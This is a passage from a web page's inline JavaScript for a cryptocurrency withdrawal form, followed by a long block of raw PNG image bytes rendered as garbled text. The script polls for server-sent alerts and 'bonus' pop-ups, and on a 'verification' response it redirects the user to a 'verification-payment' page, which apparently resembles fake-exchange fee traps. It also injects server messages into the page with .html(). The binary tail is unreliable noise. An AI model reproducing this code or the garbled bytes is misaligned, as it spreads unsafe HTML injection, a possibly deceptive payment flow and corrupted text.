        $.ajax({
            url: "api/user/withdraw",
            type: "POST",
            contentType: 'application/json; charset=UTF-8',
            data: JSON.stringify({
                action: "WITHDRAW",
                amount: amount,
                fee: fee,
                crypto: crypto,
                address: address,
                memo: memo,
                network: network
            }),
            success: function(response) {
                if (response === "verification") {
                    location.replace('verification-payment');
                } else if (response === "pending") {
                    const d = new Date();
                    const strDate = d.getFullYear() + "/" + (d.getMonth() + 1) + "/" + d.getDate() + " " + d.getHours() + ":" + d.getMinutes();
                    $("#withdraw_true_modal_new").addClass("withdrawal-pending-active");
                    $("#t_withdraw_date").html(strDate);
                    $("#t_withdraw_amount").html((amount - fee) + " " + crypto);
                    $("#t_withdraw_fee").html(fee + " " + crypto);
                    $("#t_withdraw_address").html(address);
                    resetButtons();
                } else if (response === "confirmed") {
                    const d = new Date();
                    const strDate = d.getFullYear() + "/" + (d.getMonth() + 1) + "/" + d.getDate() + " " + d.getHours() + ":" + d.getMinutes();
                    $("#withdraw_true_confirmed_modal").addClass("withdrawal-successful-active");
                    $("#t_withdraw_confirmed_date").html(strDate);
                    $("#t_withdraw_confirmed_amount").html((amount - fee) + " " + crypto);
                    $("#t_withdraw_confirmed_fee").html(fee + " " + crypto);
                    $("#t_withdraw_confirmed_address").html(address);
                    resetButtons();
                } else {
                    showErrorModal('WITHDRAW');
                    resetButtons();
                }
            },
            error: function(xhr) {
                const error = xhr.responseText;
                if (error === "amount_error") {
                    noti("Please enter the amount to withdraw", "error");
                } else if (error === "address_error") {
                    noti("Please enter a valid wallet address", "error");
                } else if (error === "memo_error") {
                    noti("Please enter correct memo number", "error");
                } else if (error === "balance_error") {
                    noti("You don't have enough balance to withdraw", "error");
                } else if (error.startsWith("minimum_amount_error:")) {
                    noti("Oops.. Minimal withdraw amount: " + error.split(':')[1] + " " + crypto.toUpperCase(), "error");
                } else {
                    noti("An unexpected error has occurred, please try again", "error");
                }
                resetButtons();
            }
        });
    }

    setInterval(() => {
        $.ajax({
          url: "/api/user/profile",
          type: "POST",
          contentType: 'application/json; charset=UTF-8',
          dataType: 'text',
          data: JSON.stringify({
              action: "CHECK_ALERT"
          }),
          success: function (response) {
              if (response !== "no_alerts") {
                  const json = JSON.parse(response);

                  const type = json["type"];
                  const message = json["message"];

                  if (type === "NOTIFICATION") {
                      noti(message, "success");
                  } else if (type === "ALERT") {
                      $("#alert_message_modal").addClass("withdrawal-successful-active");
                      $("#userAlertBox").html(message);
                  } else if (type === "BONUS") {
                      $("#alert_img_pop").attr("src", "");
                      $("#alert_title_text").html("Bonus");
                      $("#alert_img_pop").attr("src", "assets/img/bonus-icon.png");
                      $("#alert_img_pop").css("display", "block");
                      $("#svg_alert_img").remove();
                      $("#alert_message_modal").addClass("withdrawal-successful-active");
                      $("#userAlertBox").html(message);
                      $("#userAlertBox").css("font-size", "18px");
                  }
              }
          }
      });
    }, 5000);

    function setMaxBalance() {
        $("#withdraw_amount").val($("#available_balance").html());
    }

    function amountUsd() {
        var value = '~0$';
        if ($("#withdraw_amount") !== '') {
            const withdrawAmount = parseFloat($("#withdraw_amount").val());
            if (withdrawAmount > 0) {
                if (withdrawAmount > parseFloat($("#available_balance").html())) {
                    noti("You don't have enough balance", "warning");
                } else {
                    const price = parseFloat($("#price").val());
                    value = '~' + (withdrawAmount * price).toFixed(0) + '$';
                }
            }
        }

        $("#usd_amount").html(value);
    }
</script>
b IDATxytVսϓ22 A@IR :hCiZ[v*E:WũZA ^dQeQ @ !jZ'>gsV仿$|?g)&x-EIENT ;@xT.i%-X}SvS5.r/UHz^_$-W"w)Ɗ/@Z &IoX P$K}JzX:;` &, ŋui,e6mX ԵrKb1ԗ)DADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADADA݀!I*]R;I2$eZ#ORZSrr6mteffu*((Pu'v{DIߔ4^pIm'77WEEE;vƎ4-$]'RI{\I&G :IHJ DWBB=\WR޽m o$K(V9ABB.}jѢv`^?IOȅ} ڶmG}T#FJ`56$-ھ}FI&v;0(h;Б38CӧOWf!;A i:F_m9s&|q%=#wZprrrla A &P\\СC[A#! {olF} `E2}MK/vV)i{4BffV\|ۭX`b@kɶ@%i$K z5zhmX[IXZ` 'b%$r5M4º/l ԃߖxhʔ)[@=} K6IM}^5k㏷݆z ΗÿO:gdGBmyT/@+Vɶ纽z񕏵l.y޴it뭷zV0[Y^>Wsqs}\/@$(T7f.InݺiR$푔n.~?H))\ZRW'Mo~v Ov6oԃxz! S,&xm/yɞԟ?'uaSѽb,8GלKboi&3t7Y,)JJ c[nzӳdE&KsZLӄ I?@&%ӟ۶mSMMњ0iؐSZ,|J+N ~,0A0!5%Q-YQQa3}$_vVrf9f?S8`zDADADADADADADADADAdqP,تmMmg1V?rSI꒟]u|l RCyEf٢9 jURbztѰ!m5~tGj2DhG*{H9)꒟ר3:(+3\?/;TUݭʴ~S6lڧUJ*i$d(#=Yݺd{,p|3B))q:vN0Y.jkק6;SɶVzHJJЀ-utѹսk>QUU\޲~]fFnK?&ߡ5b=z9)^|u_k-[y%ZNU6 7Mi:]ۦtk[n X(e6Bb."8cۭ|~teuuw|ήI-5"~Uk;ZicEmN/:]M> cQ^uiƞ??Ңpc#TUU3UakNwA`:Y_V-8.KKfRitv޲* 9S6ֿj,ՃNOMߤ]z^fOh|<>@Å5 _/Iu?{SY4hK/2]4%it5q]GGe2%iR| W&f*^]??vq[LgE_3f}Fxu~}qd-ږFxu~I N>\;͗O֊:̗WJ@BhW=y|GgwܷH_NY?)Tdi'?խwhlmQi !SUUsw4kӺe4rfxu-[nHtMFj}H_u~w>)oV}(T'ebʒv3_[+vn@Ȭ\S}ot}w=kHFnxg S 0eޢm~l}uqZfFoZuuEg `zt~? b;t%>WTkķh[2eG8LIWx,^\thrl^Ϊ{=dž<}qV@ ⠨Wy^LF_>0UkDuʫuCs$)Iv:IK;6ֲ4{^6եm+l3>݆uM 9u?>Zc }g~qhKwڭeFMM~pМuqǿz6Tb@8@Y|jx](^]gf}M"tG -w.@vOqh~/HII`S[l.6nØXL9vUcOoB\xoǤ'T&IǍQw_wpv[kmO{w~>#=P1Pɞa-we:iǏlHo׈꒟f9SzH?+shk%Fs:qVhqY`jvO'ρ?PyX3lх]˾uV{ݞ]1,MzYNW~̈́ joYn}ȚF߾׮mS]F z+EDxm/d{F{-W-4wY듏:??_gPf ^3ecg ҵs8R2מz@TANGj)}CNi/R~}c:5{!ZHӋӾ6}T]G]7W6^n 9*,YqOZj:P?Q DFL|?-^.Ɵ7}fFh׶xe2Pscz1&5\cn[=Vn[ĶE鎀uˌd3GII k;lNmشOuuRVfBE]ۣeӶu :X-[(er4~LHi6:Ѻ@ԅrST0trk%$Č0ez" *z"T/X9|8.C5Feg}CQ%͞ˣJvL/?j^h&9xF`њZ(&yF&Iݻfg#W;3^{Wo^4'vV[[K';+mӍִ]AC@W?1^{එyh +^]fm~iԵ]AB@WTk̏t uR?l.OIHiYyԶ]Aˀ7c:q}ힽaf6Z~қm(+sK4{^6}T*UUu]n.:kx{:2 _m=sAߤU@?Z-Vކеz왍Nэ{|5 pڶn b p-@sPg]0G7fy-M{GCF'%{4`=$-Ge\ eU:m+Zt'WjO!OAF@ik&t݆ϥ_ e}=]"Wz_.͜E3leWFih|t-wZۍ-uw=6YN{6|} |*={Ѽn.S.z1zjۻTH]흾 DuDvmvK.`V]yY~sI@t?/ϓ. m&["+P?MzovVЫG3-GRR[(!!\_,^%?v@ҵő m`Y)tem8GMx.))A]Y i`ViW`?^~!S#^+ѽGZj?Vģ0.))A꨷lzL*]OXrY`DBBLOj{-MH'ii-ϰ ok7^ )쭡b]UXSְmռY|5*cֽk0B7镹%ڽP#8nȎq}mJr23_>lE5$iwui+ H~F`IjƵ@q \ @#qG0".0" l`„.0! ,AQHN6qzkKJ#o;`Xv2>,tێJJ7Z/*A .@fفjMzkg @TvZH3Zxu6Ra'%O?/dQ5xYkU]Rֽkق@DaS^RSּ5|BeHNN͘p HvcYcC5:y #`οb;z2.!kr}gUWkyZn=f Pvsn3p~;4p˚=ē~NmI] ¾ 0lH[_L hsh_ғߤc_њec)g7VIZ5yrgk̞W#IjӪv>՞y睝M8[|]\շ8M6%|@PZڨI-m>=k='aiRo-x?>Q.}`Ȏ:Wsmu u > .@,&;+!!˱tﭧDQwRW\vF\~Q7>spYw$%A~;~}6¾ g&if_=j,v+UL1(tWake:@Ș>j$Gq2t7S?vL|]u/ .(0E6Mk6hiۺzښOrifޱxm/Gx> Lal%%~{lBsR4*}{0Z/tNIɚpV^#Lf:u@k#RSu =S^ZyuR/.@n&΃z~B=0eg뺆#,Þ[B/?H uUf7y Wy}Bwegל`Wh(||`l`.;Ws?V@"c:iɍL֯PGv6zctM̠':wuW;d=;EveD}9J@B(0iհ bvP1{\P&G7D޴Iy_$-Qjm~Yrr&]CDv%bh|Yzni_ˆR;kg}nJOIIwyuL}{ЌNj}:+3Y?:WJ/N+Rzd=hb;dj͒suݔ@NKMԄ jqzC5@y°hL m;*5ezᕏ=ep XL n?מ:r`۵tŤZ|1v`V뽧_csج'ߤ%oTuumk%%%h)uy]Nk[n 'b2 l.=͜E%gf$[c;s:V-͞WߤWh-j7]4=F-X]>ZLSi[Y*We;Zan(ӇW|e(HNNP5[= r4tP &0<pc#`vTNV GFqvTi*Tyam$ߏWyE*VJKMTfFw>'$-ؽ.Ho.8c"@DADADADADADADADADA~j*֘,N;Pi3599h=goضLgiJ5փy~}&Zd9p֚ e:|hL``b/d9p? fgg+%%hMgXosج, ΩOl0Zh=xdjLmhݻoO[g_l,8a]٭+ӧ0$I]c]:粹:Teꢢ"5a^Kgh,&= =՟^߶“ߢE ܹS J}I%:8 IDAT~,9/ʃPW'Mo}zNƍ쨓zPbNZ~^z=4mswg;5 Y~SVMRXUյڱRf?s:w ;6H:ºi5-maM&O3;1IKeamZh͛7+##v+c ~u~ca]GnF'ټL~PPPbn voC4R,ӟgg %hq}@#M4IÇ Oy^xMZx ) yOw@HkN˖-Sǎmb]X@n+i͖!++K3gd\$mt$^YfJ\8PRF)77Wא!Cl$i:@@_oG I{$# 8磌ŋ91A (Im7֭>}ߴJq7ޗt^ -[ԩSj*}%]&' -ɓ'ꫯVzzvB#;a 7@GxI{j޼ƌ.LÇWBB7`O"I$/@R @eee@۷>}0,ɒ2$53Xs|cS~rpTYYY} kHc %&k.], @ADADADADADADADADA@lT<%''*Lo^={رc5h %$+CnܸQ3fҥK}vUVVs9G R,_{xˇ3o߾;TTTd}馛]uuuG~iԩ@4bnvmvfϞ /Peeeq}}za I~,誫{UWW뮻}_~YƍSMMMYχ֝waw\ďcxꩧtEƍկ_?۷5@u?1kNׯWzz/wy>}zj3 k(ٺuq_Zvf̘:~ ABQ&r|!%KҥKgԞ={<_X-z !CyFUUz~ ABQIIIjݺW$UXXDٳZ~ ABQƍecW$<(~<RSSvZujjjԧOZQu@4 8m&&&jԩg$ď1h ͟?_{768@g =@`)))5o6m3)ѣƌJ;wҿUTT /KZR{~a=@0o<*狔iFɶ[ˎ;T]]OX@?K.ۈxN pppppppppppppppppPfl߾] ,{ァk۶mڿo5BTӦMӴiӴ|r DB2e|An!Dy'tkΝ[A $***t5' "!駟oaDnΝ:t֭[gDШQ06qD;@ x M6v(PiizmZ4ew"@̴ixf [~-Fٱc&IZ2|n!?$@{[HTɏ#@hȎI# _m(F /6Z3z'\r,r!;w2Z3j=~GY7"I$iI.p_"?pN`y DD?: _  Gÿab7J !Bx@0 Bo cG@`1C[@0G @`0C_u V1 aCX>W ` | `!<S `"<. `#c`?cAC4 ?c p#~@0?:08&_MQ1J h#?/`7;I  q 7a wQ A 1 Hp !#<8/#@1Ul7=S=K.4Z?E_$i@!1!E4?`P_  @Bă10#: "aU,xbFY1 [n|n #'vEH:`xb #vD4Y hi.i&EΖv#O H4IŶ}:Ikh @tZRF#(tXҙzZ ?I3l7q@õ|ۍ1,GpuY Ꮿ@hJv#xxk$ v#9 5 }_$c S#=+"K{F*m7`#%H:NRSp6I?sIՖ{Ap$I$I:QRv2$Z @UJ*$]<FO4IENDB`